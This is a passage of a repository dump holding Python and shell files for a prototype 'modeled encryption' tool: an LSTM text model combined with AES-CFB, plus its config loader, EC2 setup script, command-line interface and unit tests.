training.\n\n 'epochs',\n # The number of epochs (complete passes of data) to train on.\n])\n\nTransformationsConfig = namedtuple('TransformationsConfig', [\n# Configuration values describing transformations for data input to the model.\n# Note: Translations are ran before substitutions.\n\n 'translate',\n # Optional\n # A tuple containg two strings of same length. Characters from the first\n # string will be replaced with corresponding characters from the second string.\n\n 'substitutions',\n # Optional\n # A list of regular expressions and the strings that should replace their matches.\n])\n\nConfigConstructor = namedtuple('Config', [\n# Container for configuration values.\n\n 'model',\n # ModelConfig\n\n 'encoding',\n # EncodingConfig\n\n 'training',\n # TrainingConfig\n\n 'transformations'\n # TransformationsConfig\n])\n\nclass ValidationError(Exception):\n \"\"\" Exception thrown on validation issues. \"\"\"\n pass\n\ndef build_namedtuple(constructor, values, optional):\n \"\"\" Given a namedtuple constructor and a dictionary, this ensures that\n the dictionary has the fields required for the namedtuple and then\n constructs it.\n\n If `optional` is True, then it defaults to a value of None for non-existent\n keys.\n\n If a key is missing and `optional` is not True, then a validation error is\n raised.\n\n Example:\n >> Foo = namedtuple('Foo', ['x', 'y'])\n >> values = {'x': 1, 'y': 2, 'z': 3}\n >> build_namedtuple(Foo, values)\n Foo(x=1, y=2)\n\n >> values = {'x': 1}\n >> build_namedtuple(Foo, values, optional=True)\n Foo(x=1, y=None)\n\n Args:\n constructor (namedtuple constructor): The namedtuple to build.\n\n values (dict): The key/value pairs to instantiate the namedtuple with.\n\n optional (bool): Whether or not to require all fields from the\n namedtuple to be present in `values`. If True, then missing fields\n default to None.\n\n Returns:\n Instantiated tuple.\n\n Raises:\n ValidationError: On missing fields when `optional` is False.\n \"\"\"\n for field in constructor._fields:\n if not optional and field not in values:\n raise ValidationError(\"Field '%s' is missing from '%s'\" % (field, constructor.__name__))\n return constructor(**{k:values.get(k, None) for k in constructor._fields})\n\ndef Config(kv):\n \"\"\" Given a dictionary of key/values, creates a Config object from those\n values.\n\n Args:\n kv (dict) - The values to use for creating the config.\n\n Returns:\n An instantiated Config object.\n\n Raises:\n ValidationError: If a required field is missing.\n\n ValidationError: If an invalid boundary character is provided.\n \"\"\"\n constructors = [('model' , ModelConfig , False),\n ('encoding' , EncodingConfig , False),\n ('training' , TrainingConfig , False),\n ('transformations', TransformationsConfig, True )]\n\n tuples = {key: build_namedtuple(constructor, kv[key], optional)\n for (key, constructor, optional) in constructors if key in kv}\n\n config = build_namedtuple(ConfigConstructor, tuples, optional=False)\n\n if config.model.boundary not in config.model.alphabet:\n raise ValidationError(\"The boundary must be a character present in the alphabet.\")\n\n return config\n\ndef load_config(config_file):\n \"\"\" Reads a json file and constructs a Config object from it.\n\n Args:\n config_file (string): The path to the json file to parse.\n\n Returns:\n An instantiated Config object.\n\n Raises:\n Error: If `config_file` doesn't exist.\n\n ValidationError: If required keys are missing.\n\n ValidationError: If other config validation fails.\n \"\"\"\n\n with open(config_file) as config_handle:\n raw = json.load(config_handle)\n\n if 'model' in raw and 'weights_file' in raw['model']:\n weights_file = raw['model']['weights_file']\n directory = dirname(config_file)\n normalized = normpath(join(directory, weights_file))\n raw['model']['weights_file'] = normalized\n\n return Config(raw)\n" }, { "alpha_fraction": 0.6901528239250183, "alphanum_fraction": 0.7657045722007751, "avg_line_length": 37, "blob_id": "bca91f65d0775c991984e0ad678014a3da704931", "content_id": "5ddedc59b52283a9f7f983f70c9139f62594bd08", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1178, "license_type": "no_license", "max_line_length": 130, "num_lines": 31, "path": "/src/setup.sh", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "# Script for setting up AWS EC2 machine\n# (run Ubuntu on g2.2xlarge or p2.xlarge instance type)\n\n# Base Setup\nwget https://developer.nvidia.com/compute/cuda/8.0/prod/local_installers/cuda-repo-ubuntu1604-8-0-local_8.0.44-1_amd64-deb\nsudo dpkg -i cuda-repo-ubuntu1604-8-0-local_8.0.44-1_amd64-deb\nsudo apt-get update\nsudo apt-get install -y cuda python3-pip python3-numpy python3-dev python3-wheel\nrm cuda-repo-ubuntu1604-8-0-local_8.0.44-1_amd64-deb\n\n# CUDNN Setup\ntar xvzf ~/cudnn-8.0-linux-x64-v5.1.tgz\nsudo cp -P ~/cuda/include/cudnn.h /usr/local/cuda/include\nsudo cp -P ~/cuda/lib64/libcudnn* /usr/local/cuda/lib64\nsudo chmod a+r /usr/local/cuda/include/cudnn.h /usr/local/cuda/lib64/libcudnn*\nrm ~/cudnn-8.0-linux-x64-v5.1.tgz\n\n# Python Setup\npip3 install --upgrade pip\nsudo pip3 install --upgrade 'https://storage.googleapis.com/tensorflow/linux/gpu/tensorflow-0.11.0rc2-cp35-cp35m-linux_x86_64.whl'\nsudo pip3 install pycrypto\nsudo pip3 install h5py\nsudo pip3 install theano\nsudo pip3 install keras\n\n# Environment Setup\necho 'export PATH=/usr/local/cuda-8.0/bin:$PATH' >> ~/.bash_profile\ngit clone https://github.com/stevekrenzel/modeled_encryption\n\n# Cleanup\nrm setup.sh\n" }, { "alpha_fraction": 0.5409722328186035, "alphanum_fraction": 0.5611110925674438, "avg_line_length": 27.799999237060547, "blob_id": "a7ddec03b9e927f5cfb065651a44acf49397c1e7", "content_id": "99743fed5bc528d025894341a33030dddf46a783", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1440, "license_type": "no_license", "max_line_length": 79, "num_lines": 50, "path": "/tests/mock_model.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "from config import Config\nfrom model import Model\n\nclass MockKerasModel(object):\n \"\"\" A mock keras model with sequence_length of 5, alphabet of 2 characters,\n and always predicts each character with equal probability.\n \"\"\"\n def __init__(self, base):\n sequence_length = base.config.model.sequence_length\n self.alphabet_size = len(base.config.model.alphabet)\n self.input_shape = (0, sequence_length, self.alphabet_size)\n\n def predict(self, sequence, verbose):\n self.last_sequence = sequence\n return [[1/self.alphabet_size] * self.alphabet_size]\n\nclass MockModel(Model):\n def _create_model(self):\n return MockKerasModel(self)\n\ndef config():\n \"\"\" Returns a copy of the config. \"\"\"\n return {\n 'model': {\n 'alphabet': '012',\n 'nodes': 0,\n 'sequence_length': 0,\n 'boundary': '0',\n 'weights_file': '/dev/null',\n },\n 'encoding': {\n 'normalizing_length': 0,\n 'priming_length': 0,\n 'max_padding_trials': 1000,\n 'padding_novelty_growth_rate': 1.01,\n 'novelty': 0.5,\n },\n 'training': {\n 'validation_split': 0.05,\n 'batch_size': 32,\n 'epochs': 100,\n },\n 'transformations': {\n },\n }\n\nDEFAULT_CONFIG = config()\n\ndef mock_model(config=DEFAULT_CONFIG):\n return MockModel(Config(config))\n" }, { "alpha_fraction": 0.6382636427879333, "alphanum_fraction": 0.6414790749549866, "avg_line_length": 31.736841201782227, "blob_id": "6eb03aa9eb1eaebc1f2e25ad0e65220494be1b4d", "content_id": "43ed358d263ad054af56eba4f50b33df92228afd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 622, "license_type": "no_license", "max_line_length": 71, "num_lines": 19, "path": "/tests/util/modeling_tests.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "import unittest\nfrom random import choice\nfrom util.modeling import tabulate, recite\nfrom mock_model import config, mock_model\n\nclass TestModeling(unittest.TestCase):\n\n def test_modeling(self):\n \"\"\" Test round-tripping tabulate / recite.\n\n Note: This is a non-deterministic test, but should always pass.\n \"\"\"\n model = mock_model()\n\n for i in range(20):\n alphabet = model.config.model.alphabet\n message = [choice(alphabet) for _ in range(i)]\n result = recite(model, [], tabulate(model, [], message))\n self.assertEqual(message, list(result))\n" }, { "alpha_fraction": 0.5742937326431274, "alphanum_fraction": 0.6014430522918701, "avg_line_length": 35.83333206176758, "blob_id": "3c7b30563ee50544dfd28d16f177a4048e411e53", "content_id": "8eaf1c1f7222d2459af60e526bfd7cc88efccb78", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8177, "license_type": "no_license", "max_line_length": 246, "num_lines": 222, "path": "/src/model.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "import re\nimport numpy as np\nfrom os.path import isfile\nfrom functools import partial\nfrom random import choice\nfrom config import load_config\nfrom util.keras import Sequential, LSTM, Dense, Activation\nfrom util.one_hot_encoding import one_hot_encoding\nfrom util.math import log_normalize\nfrom util.modeling import recite\nfrom util.randoms import random_ints\n\nclass Model(object):\n \"\"\" A model that can learn and predict sequences.\n\n Attrs:\n config (Config): The model's config.\n \"\"\"\n\n def __init__(self, config):\n \"\"\" Instantiates a model instance given a config object.\n\n Args:\n config (Config): The model's config object.\n\n Raises:\n Exception: If model fails to build.\n \"\"\"\n self.config = config\n self.model = self._create_model()\n\n def predict(self, sequence, novelty=None):\n \"\"\" Given a sequence, returns the probabilities of each character in\n the alphabet following the sequence.\n\n Note: A large novelty will cause the probabilities to converge to a\n uniform distribution.\n\n Example:\n >> phrase = 'THIS IS A VERY LONG EXAMPLE SEQUENCE TO BE USED IN'\n >> probs = model.predict(phrase)\n >> [round(p, 2) for p in probs] # Round probabilities for simplicity\n [0.0, 0.0, 0.83, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.17, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]\n >> list(zip(model.alphabet, [round(p, 2) for p in probs]))\n [(' ', 0.83), <... ommitted ...>, ('T', 0.17), <... ommitted ...>]\n\n >> novelty = 100.0 # Huge for a novelty, will make values uniform-ish\n >> probs = model.predict(phrase, novelty)\n >> [round(p, 2) for p in probs]\n [0.02, 0.02, 0.03, 0.02, 0.02, 0.02, 0.02, 0.02, 0.02, 0.02, 0.02, 0.02, 0.02, 0.03, 0.03, 0.03, 0.03, 0.03, 0.03, 0.03, 0.03, 0.03, 0.02, 0.03, 0.03, 0.03, 0.03, 0.03, 0.03, 0.02, 0.03, 0.03, 0.03, 0.03, 0.03, 0.03, 0.02, 0.03, 0.03]\n\n Args:\n sequence (string): The sequence of characters to predict the next\n character for.\n\n novelty (float): The conservativeness of the prediction. A smaller\n number results in more conservative estimates.\n\n Returns:\n A list of probabilities corresponding to the liklihood of each\n letter in the model's alphabet occuring next in the sequence.\n\n Raises:\n ValueError: If `sequence` contains an item that is not present in\n the model's alphabet.\n \"\"\"\n if novelty == None:\n novelty = self.config.encoding.novelty\n\n alphabet = self.config.model.alphabet\n encoded = one_hot_encoding(sequence, alphabet)\n nested = np.array([encoded], dtype=np.bool)\n probabilities = self.model.predict(nested, verbose=0)[0]\n return log_normalize(probabilities, novelty)\n\n def train(self, data):\n \"\"\" Trains the model on the provided data.\n\n This will print out a summary of the model structure, followed by\n metrics and progress on training. After each epoch, the weights will\n be saved to the model's directory, if one is provided.\n\n Args:\n data (string): The data to train the model on.\n\n batch_size (int): The batch size for training.\n\n epochs (int): The number of times to train on the entire data set.\n\n validation_split (float): The percentage of data to use for validation.\n\n Returns:\n Nothing. Updates the internal state of the model.\n \"\"\"\n alphabet = self.config.model.alphabet\n sequence_length = self.config.model.sequence_length\n batch_size = self.config.training.batch_size\n epochs = self.config.training.epochs\n validation_split = self.config.training.validation_split\n weights_file = self.config.model.weights_file\n\n self.model.summary()\n transformed = self.transform(data)\n encoded = one_hot_encoding(transformed, alphabet)\n X = np.array([encoded[i : i + sequence_length] for i in range(len(encoded) - sequence_length)])\n y = np.array(encoded[sequence_length:])\n for i in range(epochs):\n print()\n print(\"-\" * 79)\n print(\"Epoch %s\" % (i))\n self.model.fit(X, y, validation_split=validation_split, batch_size=batch_size, nb_epoch=1, shuffle=True)\n self.model.save(weights_file)\n print(\"Saved weights to '%s'\" % (weights_file))\n print(\"Sampling model: \")\n print(self.sample(50))\n\n def sample(self, size, novelty=None):\n \"\"\" Generates sample output from the model.\n\n Example:\n >> model.sample(10)\n 'OPERATE IN THE AREAS'\n\n Args:\n size (int): The length of output to generate.\n\n novelty (optional: float): The novelty to use when generating the sequence.\n\n Returns:\n A sequence of characters generated by the model.\n \"\"\"\n alphabet = self.config.model.alphabet\n sequence_length = self.config.model.sequence_length\n\n initial = [choice(alphabet) for _ in range(sequence_length - 1)] + [self.config.model.boundary]\n sequence = recite(self, initial, random_ints(), novelty)\n return \"\".join(c for (c, _) in zip(sequence, range(size)))\n\n def transform(self, data):\n \"\"\"Applies the model's transformations to the supplied data.\n\n Example:\n >> model.transform(\"Hello, my name is Steve.\")\n 'HELLO MY NAME IS STEVE '\n\n Args:\n data (string): The data to transform.\n\n Returns:\n The transformed data.\n\n Raises:\n Exception: If data contains characters that aren't specified in the\n alphabet, after all of the transformations are performed.\n \"\"\"\n alphabet = self.config.model.alphabet\n transformations = self.config.transformations\n translate = transformations.translate\n substitutions = transformations.substitutions\n\n if translate != None:\n translate = transformations.translate\n original = translate[0]\n translated = translate[1]\n data = data.translate(str.maketrans(original, translated))\n\n if substitutions != None:\n for (pattern, sub) in substitutions:\n regex = re.compile(pattern)\n data = regex.sub(sub, data)\n\n chars = set(alphabet)\n if any(c not in chars for c in data):\n raise Exception(\"Data contains non-alphabet characters post-transformation. Can't continue.\")\n\n return data\n\n def _create_model(self):\n alphabet = self.config.model.alphabet\n sequence_length = self.config.model.sequence_length\n nodes = self.config.model.nodes\n weights_file = self.config.model.weights_file\n\n alphabet_size = len(alphabet)\n input_shape = (sequence_length, alphabet_size)\n loss = 'categorical_crossentropy'\n optimizer = 'adadelta'\n metrics = ['accuracy']\n\n hidden_layer = LSTM(nodes,\n input_shape=input_shape,\n consume_less=\"cpu\")\n output_layer = Dense(alphabet_size)\n activation = Activation('softmax')\n\n model = Sequential()\n model.add(hidden_layer)\n model.add(output_layer)\n model.add(activation)\n model.compile(loss=loss, optimizer=optimizer, metrics=metrics)\n\n if isfile(weights_file):\n model.load_weights(weights_file)\n\n return model\n\ndef load_model(config_file):\n \"\"\"Loads a model from a given config file.\n\n Args:\n config_file (string): The filename of the config file to load the model from.\n\n Returns:\n The loaded model.\n\n Raises:\n Exception: If the model config fails to validate.\n\n Exception: If the keras model fails to build.\n \"\"\"\n config = load_config(config_file)\n return Model(config)\n" }, { "alpha_fraction": 0.6293706297874451, "alphanum_fraction": 0.6381118893623352, "avg_line_length": 34.75, "blob_id": "bb97c4fa1e51db7cc8cd6a541e9462579cf799bf", "content_id": "111577248abfe6482c18364e5572b59e6a823175", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 572, "license_type": "no_license", "max_line_length": 133, "num_lines": 16, "path": "/tests/util/one_hot_encoding_tests.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "import unittest\nfrom util.one_hot_encoding import one_hot_encoding\n\ndef ohe(xs, classes):\n return one_hot_encoding(xs, classes).tolist()\n\nclass TestOneHotEncoding(unittest.TestCase):\n\n def test_one_hot_encoding(self):\n self.assertEqual(ohe([], range(3)), [])\n self.assertEqual(ohe([0], range(1)), [[True]])\n self.assertEqual(ohe(\"abc\", \"abcd\"), [[True, False, False, False], [False, True, False, False], [False, False, True, False]])\n\n # Test out of bounds value\n with self.assertRaises(ValueError):\n ohe([1], range(1))\n" }, { "alpha_fraction": 0.5450381636619568, "alphanum_fraction": 0.6206107139587402, "avg_line_length": 42.63333511352539, "blob_id": "8f48a81722f94677dc0e245291154f30e6724d28", "content_id": "ae9d9cfc0b296010e7025ad93ddbc49b6e8fc958", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1310, "license_type": "no_license", "max_line_length": 90, "num_lines": 30, "path": "/tests/util/math_tests.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "import unittest\nfrom util.math import log_normalize, scale\n\nclass TestLists(unittest.TestCase):\n\n def test_log_normalize(self):\n self.assertArrayAlmostEqual(log_normalize([], None), [])\n self.assertArrayAlmostEqual(log_normalize([1], 1.0), [1])\n\n # A temperature of 1.0 should be equivalent to standard normalization\n self.assertArrayAlmostEqual(log_normalize([1, 1], 1.0), [1/2, 1/2])\n self.assertArrayAlmostEqual(log_normalize([1, 2, 3], 1.0), [1/6, 2/6, 3/6])\n\n # As temperature approaches zero, highest value should get all weight\n self.assertArrayAlmostEqual(log_normalize([1, 2, 3], 0.01), [0, 0, 1])\n\n # As temperature approaches infinity, weights should become uniform\n self.assertArrayAlmostEqual(log_normalize([1, 2, 3], 10000000.0), [1/3, 1/3, 1/3])\n\n def test_scale(self):\n self.assertEqual(scale([0.5], 10), [10])\n self.assertEqual(scale([0.5, 0.5], 10), [5, 5])\n self.assertEqual(scale([0.0, 0.5], 10), [0, 10])\n self.assertEqual(scale([0.0, 0.5], 10, 1), [1, 9])\n self.assertEqual(scale([0.0, 0.2, 0.8], 100, 1), [1, 20, 79])\n\n def assertArrayAlmostEqual(self, xs, ys):\n self.assertEqual(len(xs), len(ys))\n for x, y in zip(xs, ys):\n self.assertAlmostEqual(x, y)\n\n" }, { "alpha_fraction": 0.6103895902633667, "alphanum_fraction": 0.6415584683418274, "avg_line_length": 37.5, "blob_id": "061c54dccb3f445f6b40c65c87415b9663d6e9c8", "content_id": "71f69f997b72169a5197f86f19ab18c55dce1b3e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 385, "license_type": "no_license", "max_line_length": 70, "num_lines": 10, "path": "/tests/util/packing_tests.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "import unittest\nfrom util.packing import pack_ints, unpack_ints\n\nclass TestPacking(unittest.TestCase):\n\n def test_packing(self):\n self.assertEqual(unpack_ints(pack_ints([])), ())\n self.assertEqual(unpack_ints(pack_ints([1])), (1,))\n self.assertEqual(unpack_ints(pack_ints([1, 2])), (1, 2))\n self.assertEqual(unpack_ints(pack_ints([1, 2, 3])), (1, 2, 3))\n" }, { "alpha_fraction": 0.5908513069152832, "alphanum_fraction": 0.5937103033065796, "avg_line_length": 34.772727966308594, "blob_id": "288aa8b52941e31ff5c16267edaf8191e256e181", "content_id": "4fbc3449fb0b3f897a40224182ebc2613bdb9ea7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3148, "license_type": "no_license", "max_line_length": 79, "num_lines": 88, "path": "/src/encryption.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "from Crypto.Cipher import AES\nfrom hashlib import sha256\nfrom os import urandom\nfrom encoding import encode, decode\n\n###############################################################################\n# WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARN#\n# #\n# This implements NON-AUTHENTICATED encryption / decryption. #\n# #\n# WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARN#\n###############################################################################\n\ndef encrypt(model, key, plaintext):\n \"\"\"Encrypts the plaintext using AES with a model-based transformation.\n\n Note: If the plaintext does not end with a boundary (e.g. space), it will\n be appended. The boundary is defined in `model.boundary`.\n\n Example:\n >> ciphertext = encrypt(model, \"foo\", \"bar\")\n >> decrypt(model, \"foo\", ciphertext)\n \"BAR \"\n\n Args:\n model (Keras Model): A model that has been trained on a domain related\n to the plaintext being encrypted.\n\n key (string): A key to use to encrypt the plaintext.\n\n plaintext (string): The plaintext to be encrypted. The plaintext\n should only contain values that are present in the `model`'s\n alpahbet.\n\n Returns (bytes):\n The encrypted ciphertext.\n\n Raises:\n ValueError: If `plaintext` contains an item that isn't in the `model`'s\n alphabet.\n\n Exception: If padding the encoded plaintext fails. This is a\n non-deterministic process. The probability of this happening is\n highly unlikely, but not impossible. If your model has a boundary\n that occurs with a low-probability and you're getting this\n exception, increase your model's max_padding_trials attribute.\n \"\"\"\n iv = urandom(AES.block_size)\n\n encoded = encode(model, plaintext, AES.block_size)\n encrypted = _get_cipher(key, iv).encrypt(encoded)\n\n return iv + encrypted\n\ndef decrypt(model, key, ciphertext):\n \"\"\"Decrypts the ciphertext using AES with a model-based transformation.\n\n Example:\n >> ciphertext = encrypt(model, \"foo\", \"bar\")\n >> decrypt(model, \"foo\", ciphertext)\n \"BAR \"\n\n Args:\n model (Keras Model): The model that was used when encrypting the\n provided ciphertext.\n\n key (string): A key to use to decrypt the ciphertext.\n\n ciphertext (bytes): The ciphertext to be decrypted.\n\n Returns (string):\n The decrypted plaintext.\n \"\"\"\n iv = ciphertext[:AES.block_size]\n ciphertext = ciphertext[AES.block_size:]\n\n decrypted = _get_cipher(key, iv).decrypt(ciphertext)\n decoded = decode(model, decrypted)\n\n return decoded\n\ndef _get_cipher(key, iv):\n \"\"\" Returns an AES cipher in CFB mode. \"\"\"\n return AES.new(_transform_key(key), AES.MODE_CFB, iv)\n\ndef _transform_key(key):\n \"\"\" Securely hashes a key to a 32 byte block. \"\"\"\n return sha256(bytes(key, 'utf-8')).digest()\n" }, { "alpha_fraction": 0.6537573337554932, "alphanum_fraction": 0.657843291759491, "avg_line_length": 41.00746154785156, "blob_id": "622516ed2b7490c50c83761f5032b2b7f11789fd", "content_id": "148f42d9732778d01bb4afa1de0375e04e58af6d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5629, "license_type": "no_license", "max_line_length": 236, "num_lines": 134, "path": "/src/main.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "import argparse\nfrom sys import argv, exit\nfrom getpass import getpass\nfrom base64 import b64encode, b64decode\nfrom model import load_model\nfrom encryption import encrypt, decrypt\nfrom util.io import confirmed_get_pass, read_file\n\ndef encrypt_command(args):\n key = args.key\n if key == None:\n key = confirmed_get_pass(\"Encryption Key: \", \"Confirm Encryption Key: \")\n if key == None:\n print(\"Keys didn't match. Exiting.\")\n exit(2)\n\n model = load_model(args.config)\n # NOTE We rstrip() the plaintext. Input tends to end in newlines and it can\n # be a signal to an attacker (e.g. by checking if the decoy output has a newline).\n plaintext = read_file(args.file).rstrip()\n encrypted = encrypt(model, key, plaintext)\n encoded = str(b64encode(encrypted), 'utf-8')\n print(encoded)\n\ndef decrypt_command(args):\n key = args.key\n if key == None:\n key = getpass(\"Decryption Key: \")\n\n model = load_model(args.config)\n encoded = read_file(args.file)\n ciphertext = b64decode(encoded)\n decrypted = decrypt(model, key, ciphertext)\n print(decrypted)\n\ndef train_command(args):\n model = load_model(args.config)\n data = read_file(args.data)\n model.train(data)\n\ndef sample_command(args):\n model = load_model(args.config)\n size = int(args.size)\n novelty = None if args.novelty == None else float(args.novelty)\n print(model.sample(size, novelty))\n\ndef main():\n parser = argparse.ArgumentParser(\n prog='menc',\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description=\"\"\"\\\nPrototype of a modeled encryption implementation.\n\nExample Usage:\n\n Encryption / Descryption\n =============================================================================\n\n - Encrypt a file:\n $ menc encrypt -c models/military/config.json -f filename\n\n - Encrypt from stdin:\n $ echo 'Hello World!' | menc encrypt -c models/military/config.json\n\n - Encrypt from stdin, key provided as arg:\n $ echo 'Hello World!' | menc encrypt -c models/military/config.json -k foo\n\n - Store encrypted result into a file:\n $ echo 'Hello World!' | menc encrypt -c models/military/config.json > encrypted_file\n\n - Decrypt a file:\n $ menc decrypt -c models/military/config.json -f filename\n\n - Decrypt from stdin:\n $ cat encrypted | menc decrypt -c models/military/config.json\n\n - Decrypt from stdin, key provided as arg:\n $ cat encrypted | menc decrypt -c models/military/config.json -k foo\n\n - Store decrypted result into a file:\n $ cat encrypted | menc -c models/military/config.json > decrypted_file\n\n - Round-trip (encrypt and then decrypt):\n $ echo 'Hello world!' | menc encrypt -c models/military/config.json -k foo | menc decrypt -c models/military/config.json -k foo\n\n Training\n =============================================================================\n\n - Train from data in a file:\n $ menc train -c models/military/config.json -d models/military/data.txt\n\n - Train from stdin:\n $ cat models/military/data.txt | menc train -c models/military/config.json\n\n Sampling\n =============================================================================\n\n - Generate a random sequence of length 100:\n $ menc sample -c models/military/config.json -s 100\"\"\")\n subparsers = parser.add_subparsers()\n\n encrypt_parser = subparsers.add_parser('encrypt', help=\"Encrypt a plaintext.\")\n encrypt_parser.add_argument('-c', '--config', metavar=\"CONFIG_PATH\", help=\"Path to the model config.\", required=True)\n encrypt_parser.add_argument('-k', '--key', help=\"The string to use as the encryption key. If ommitted, a password prompt will securely ask for one. Note: Providing a key on the command-line may store the key in your shell history.\")\n encrypt_parser.add_argument('-f', '--file', help=\"File to encrypt. Reads stdin if not provided.\")\n encrypt_parser.set_defaults(func=encrypt_command)\n\n decrypt_parser = subparsers.add_parser('decrypt', help=\"Decrypt a ciphertext.\")\n decrypt_parser.add_argument('-c', '--config', metavar=\"CONFIG_PATH\", help=\"Path to the model config.\", required=True)\n decrypt_parser.add_argument('-k', '--key', help=\"The string to use as the decryption key. If ommitted, a password prompt will securely ask for one. Note: Providing a key on the command-line may store the key in your shell history.\")\n decrypt_parser.add_argument('-f', '--file', help=\"File to decrypt. Reads stdin if not provided.\")\n decrypt_parser.set_defaults(func=decrypt_command)\n\n train_parser = subparsers.add_parser('train', help=\"Train a model on a given set of data.\")\n train_parser.add_argument('-c', '--config', metavar=\"CONFIG_PATH\", help=\"Path to the model config.\", required=True)\n train_parser.add_argument('-d', '--data', help=\"Path to data to train on.\")\n train_parser.set_defaults(func=train_command)\n\n sample_parser = subparsers.add_parser('sample', help=\"Sample a random sequence from a model.\")\n sample_parser.add_argument('-c', '--config', metavar=\"CONFIG_PATH\", help=\"Path to the model config.\", required=True)\n sample_parser.add_argument('-s', '--size', help=\"Length of the sequence to generate.\", required=True)\n sample_parser.add_argument('-n', '--novelty', help=\"A float that determines how conservative the predictions are. Lower is more conservative. Typical ranges are 0.1 to 2.0.\")\n sample_parser.set_defaults(func=sample_command)\n\n args = parser.parse_args()\n\n if 'func' not in args:\n parser.print_help()\n exit(1)\n\n args.func(args)\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.4667931795120239, "alphanum_fraction": 0.4667931795120239, "avg_line_length": 26.736841201782227, "blob_id": "8389a9db77c76b32be0a09e013c7d0fa4f47e333", "content_id": "d9d74e1bab600246bd77c22e6937844756b94cb9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 527, "license_type": "no_license", "max_line_length": 85, "num_lines": 19, "path": "/src/util/keras.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "\"\"\" Keras writes to stderr unconditionally, so we disable stderr while importing. \"\"\"\nimport sys\nfrom os import devnull\n\n#################################\n# Disable stderr\n#################################\n_old_stderr = sys.stderr\nsys.stderr = open(devnull, 'w')\n#################################\n\nfrom keras.models import Sequential\nfrom keras.layers import LSTM, Dense, Activation\n\n#################################\n# Enable stderr\n#################################\nsys.stderr = _old_stderr\n#################################\n" }, { "alpha_fraction": 0.5661799311637878, "alphanum_fraction": 0.593028724193573, "avg_line_length": 39.03773498535156, "blob_id": "e8bbc1c67171b882c84c1e6e8986a22adaf73ada", "content_id": "40615a4d67b3f770b1f6d3d02a5396ffca0a821a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2123, "license_type": "no_license", "max_line_length": 81, "num_lines": 53, "path": "/tests/util/padding_tests.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "import unittest\nfrom random import choice\nfrom util.packing import BYTES_IN_INT\nfrom util.padding import pad, unpad\nfrom model import Model\nfrom mock_model import mock_model\n\nclass TestPadding(unittest.TestCase):\n\n def test_padding(self):\n \"\"\" Test round-tripping padding.\n\n Note: This is a non-deterministic test, but should always pass.\n \"\"\"\n model = mock_model()\n\n # Blocksizes that aren't a multiple of BYTES_IN_INT should error.\n for i in range(BYTES_IN_INT):\n with self.assertRaises(ValueError):\n pad(model, [], \"\", i)\n\n # Padding should always add a boundary character if it doesn't end in one\n for message in map(list, [\"\", \"1\", \"12\", \"012\", \"102\"]):\n padded = pad(model, [], message, BYTES_IN_INT)\n unpadded = unpad(model, padded)\n self.assertEqual(unpadded, message + ['0'])\n\n # Padding should not add a boundary character if it already ends in one\n for message in map(list, [\"0\", \"00\", \"10\", \"120\", \"0120\", \"1020\"]):\n padded = pad(model, [], message, BYTES_IN_INT)\n unpadded = unpad(model, padded)\n self.assertEqual(unpadded, message)\n\n # Test various blocksizes and message lengths\n blocksizes = range(BYTES_IN_INT, 10 * BYTES_IN_INT, BYTES_IN_INT)\n\n for message_length in range(0, 20):\n for blocksize in blocksizes:\n message = [choice(\"012\") for _ in range(message_length)] + ['0']\n padded = pad(model, [], message, blocksize)\n self.assertEqual((len(padded) * BYTES_IN_INT) % blocksize, 0)\n self.assertEqual(message, list(unpad(model, padded)))\n\n def test_unpad(self):\n model = mock_model()\n\n self.assertEqual(unpad(model, \"\"), \"\")\n self.assertEqual(unpad(model, \"0\"), \"\")\n self.assertEqual(unpad(model, \"00\"), \"0\")\n self.assertEqual(unpad(model, \"10\"), \"1\")\n self.assertEqual(unpad(model, \"010\"), \"0\")\n self.assertEqual(unpad(model, \"110\"), \"11\")\n self.assertEqual(unpad(model, \"0110\"), \"0\")\n\n" }, { "alpha_fraction": 0.5741626620292664, "alphanum_fraction": 0.5961722731590271, "avg_line_length": 34.423728942871094, "blob_id": "42ea08ab04371c391e377f072936e339329aadf6", "content_id": "54cda7ec6d35ad75a6180e881ab6379be44906e1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2090, "license_type": "no_license", "max_line_length": 109, "num_lines": 59, "path": "/tests/model_tests.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "import 